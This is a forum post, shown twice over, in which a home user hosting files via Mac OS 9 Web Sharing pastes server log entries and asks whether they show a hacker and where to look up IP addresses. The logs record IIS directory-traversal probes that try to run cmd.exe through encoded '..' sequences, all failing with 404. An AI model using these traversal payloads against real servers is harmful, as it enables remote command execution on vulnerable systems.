The Madhatter
Registered
I was the dude that posted the DivX movie apps package and I hosted it using Web Sharing in OS 9. I kept looking at the log to see how many people got the apps and what not, but I just looked at it and this is what I saw:
128.59.226.17 - - [10/DEC/2001:21:02:06 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:07 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:07 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:07 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:08 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404186
128.59.226.17 - - [10/DEC/2001:21:02:08 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:09 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:09 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
There was more, but I didn't wanna fill up the whole page. It appears to me like someone was trying to access the command line or root or something. I am guessing it was a hacker, planning on changing something or screwing up my comp. Am I right, cause if so that is quite interesting? Good thing he couldn't.
I searched a couple of places that let you look up IP addresses, but they all cost. Anyone know of any free ones?
Just curious, and thanks a lot for your help.
128.59.226.17 - - [10/DEC/2001:21:02:06 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:07 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:07 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:07 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:08 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404186
128.59.226.17 - - [10/DEC/2001:21:02:08 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:09 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:09 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
There was more, but I didn't wanna fill up the whole page. It appears to me like someone was trying to access the command line or root or something. I am guessing it was a hacker, planning on changing something or screwing up my comp. Am I right, cause if so that is quite interesting? Good thing he couldn't.
I searched a couple of places that let you look up IP addresses, but they all cost. Anyone know of any free ones?
Just curious, and thanks a lot for your help.
